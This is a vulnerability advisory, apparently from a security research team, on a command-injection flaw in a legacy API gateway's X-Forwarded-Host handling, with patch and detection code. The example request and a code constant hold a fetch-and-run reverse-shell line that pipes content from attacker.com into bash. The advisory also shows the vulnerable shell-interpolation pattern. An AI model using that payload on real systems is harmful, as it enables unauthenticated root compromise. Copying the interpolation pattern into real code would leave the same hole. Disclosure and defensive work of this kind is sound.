
Critical RCE Vulnerability in Legacy Enterprise Gateway

Eresus Security Research Team (Security Researcher)
March 15, 2026

ERESUS-ADV-2026-001: Remote Code Execution in Legacy Enterprise Gateway

Overview

During a recent engagement, Eresus Security researchers discovered an unauthenticated Remote Code Execution (RCE) vulnerability in a widely used but legacy enterprise API gateway. The vulnerability allows an attacker to bypass authentication and execute arbitrary commands on the underlying system with root privileges.

Technical Details

The vulnerability stems from missing input validation in the component that parses the X-Forwarded-Host header. The gateway's logging service passes the raw header value into a shell command line without validating or escaping it, so shell metacharacters in a crafted header (a command separator such as `;`, a pipe, or command substitution) terminate the intended logging command and start one chosen by the attacker, which the shell then executes.

An attacker can exploit this with a single crafted request; no session or credentials are needed:

GET /api/v1/status HTTP/1.1
Host: target-gateway.local
X-Forwarded-Host: ; bash -c 'curl http://attacker.com/revshell | bash'

Since the logging daemon runs as root, the injected command runs as root as well, yielding a root shell without any authentication.
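The following is an added example, not the vendor's code or the advisory's: a hypothetical Python logging routine that splices the header into a shell command, a tokenizer that shows which simple commands /bin/sh would run for the request above without actually running them, and the hardened form (allowlist validation of host[:port] syntax plus an argv list with no shell). The command name `logger`, the sample header values and the host regex are assumptions made for the example.

```python
"""Added illustration of the bug class in this advisory (header value spliced
into a shell command). None of this is the vendor's code: the vulnerable
pattern, the hardened version and the sample header values are assumptions
made for the example. The hostile value is the one from the request above."""
import re
import shlex
import subprocess
from typing import List

# Constructed sample header values.
BENIGN_XFH = "api.example.com:8443"
HOSTILE_XFH = "; bash -c 'curl http://attacker.com/revshell | bash'"


def build_log_command_vulnerable(xfh: str) -> str:
    """Hypothetical vulnerable pattern: the raw header is interpolated into a
    command string that the service would pass to /bin/sh via shell=True.
    The string is returned rather than executed so the example runs safely."""
    return f"logger -t gateway forwarded_host={xfh}"


def shell_commands(cmdline: str) -> List[List[str]]:
    """Tokenize a command line the way a POSIX shell would (quotes honoured,
    ';' '|' '&&' '||' recognised as control operators) and return the simple
    commands the shell would run. Shows the injection without running it."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok in (";", "|", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


# Conservative host[:port] syntax: DNS labels or an IPv4 literal plus an optional
# port. Bracketed IPv6 literals are deliberately rejected; widen if they are expected.
_HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?(?::\d{1,5})?")


def is_valid_forwarded_host(xfh: str) -> bool:
    """Allowlist check: accept only values that fit host[:port] syntax."""
    return _HOST_RE.fullmatch(xfh) is not None


def validate_forwarded_host(xfh: str) -> str:
    """Reject anything outside host syntax instead of stripping 'bad' characters."""
    if not is_valid_forwarded_host(xfh):
        raise ValueError("X-Forwarded-Host is not a host[:port] value")
    return xfh


def build_log_command_hardened(xfh: str) -> List[str]:
    """Hardened pattern: validate first, then build an argv list. With no shell
    involved, the value is a single argument whatever characters it contains."""
    return ["logger", "-t", "gateway", f"forwarded_host={validate_forwarded_host(xfh)}"]


def log_forwarded_host(xfh: str) -> int:
    """Run the hardened command with shell=False; returns the exit status."""
    return subprocess.run(build_log_command_hardened(xfh), check=False).returncode


if __name__ == "__main__":
    for label, value in (("benign", BENIGN_XFH), ("hostile", HOSTILE_XFH)):
        print(f"{label}: shell would run", shell_commands(build_log_command_vulnerable(value)))
        try:
            print(f"{label}: hardened argv", build_log_command_hardened(value))
        except ValueError as exc:
            print(f"{label}: rejected ({exc})")
```

For the hostile header the tokenizer returns two commands, the truncated `logger` invocation and `bash -c 'curl ... | bash'`, which is exactly the split the shell performs at the `;`. The hardened version gets its safety from the argv list, which removes the shell from the path entirely; the validator is a second, independent layer that also stops the header from carrying junk into the log.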

Impact

Successful exploitation allows an unauthenticated attacker to take full control of the API gateway, potentially leading to lateral movement across the internal enterprise network and exposure of highly sensitive operational data.

Remediation

Eresus Security responsibly disclosed this vulnerability to the vendor, who has since issued a patch. Users are advised to:

  1. Immediately apply the latest security patch provided by the vendor.
  2. Restrict external exposure of the management and logging interfaces. Note that the request above targets an ordinary API route, so reducing exposure limits the attack surface but does not replace the patch.
  3. Monitor network egress logs for outbound connections from API gateway instances to destinations they have no business reaching; the example payload fetches a second stage over plain HTTP, so an unexpected outbound connection from a gateway is a strong indicator.
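An added example of the egress check in step 3 (not part of the advisory): a small Python scanner over constructed key=value egress log lines that flags connections from gateway instances to destinations outside an allowlist. The log format, the host inventory and the allowlist are assumptions made for the example; adapt the parser to the firewall or flow-log format actually in use.

```python
"""Added example of the egress check in remediation step 3. The log format,
host inventory and allowlist are assumptions made for the example, not the
advisory's or the vendor's."""
import ipaddress
from typing import Dict, List

# Assumed inventory: API gateway instances and the destinations they are
# expected to reach (internal upstreams and one assumed vendor update mirror).
GATEWAY_HOSTS = {"10.0.1.5", "10.0.1.6"}
ALLOWED_EGRESS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.0.2.10/32"),  # assumed update mirror (TEST-NET-1 address)
]

# Constructed egress log lines in a key=value style; not real traffic.
SAMPLE_EGRESS_LOG = """\
2026-03-10T12:00:01Z src=10.0.1.5 dst=10.0.20.8 dport=8080 proto=tcp action=allow
2026-03-10T12:00:04Z src=10.0.1.5 dst=192.0.2.10 dport=443 proto=tcp action=allow
2026-03-10T12:00:09Z src=10.0.1.6 dst=198.51.100.23 dport=80 proto=tcp action=allow
2026-03-10T12:00:11Z src=10.0.3.7 dst=198.51.100.23 dport=443 proto=tcp action=allow
2026-03-10T12:00:15Z src=10.0.1.6 dst=198.51.100.23 dport=4444 proto=tcp action=deny
garbage line that does not parse
"""


def parse_line(line: str) -> Dict[str, str]:
    """Parse 'timestamp key=value ...' into a dict; return {} for anything malformed."""
    parts = line.split()
    if len(parts) < 2:
        return {}
    fields = {"ts": parts[0]}
    for kv in parts[1:]:
        if "=" not in kv:
            return {}
        key, value = kv.split("=", 1)
        fields[key] = value
    return fields


def is_allowed_destination(dst: str) -> bool:
    """True if dst is an IP literal inside one of the allowlisted networks."""
    try:
        addr = ipaddress.ip_address(dst)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_EGRESS)


def find_suspicious_egress(log_text: str) -> List[Dict[str, str]]:
    """Return the records where a gateway instance reached (or tried to reach)
    a destination outside the allowlist. Denied attempts are kept: a blocked
    callback still means something on the gateway tried to phone home."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec.get("src") not in GATEWAY_HOSTS:
            continue
        if is_allowed_destination(rec.get("dst", "")):
            continue
        rec["reason"] = (
            f"gateway {rec['src']} -> {rec.get('dst')}:{rec.get('dport')} "
            f"outside egress allowlist (action={rec.get('action')})"
        )
        findings.append(rec)
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_egress(SAMPLE_EGRESS_LOG):
        print(finding["ts"], finding["reason"])
```

On the constructed log this flags the two connections from 10.0.1.6 to 198.51.100.23 (the port-80 fetch and the later denied attempt on 4444) and ignores the same destination reached from a non-gateway host, which is the distinction step 3 relies on: the gateway's own egress profile should be narrow enough that any deviation is worth a ticket.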

Timeline

  • 2026-02-12: Vulnerability discovered during a red team engagement.
  • 2026-02-15: Vendor notified under coordinated disclosure.
  • 2026-02-17: Vendor acknowledged the issue and began working on a patch.
  • 2026-03-01: Patch released to the public.
  • 2026-03-15: Eresus Security published this advisory.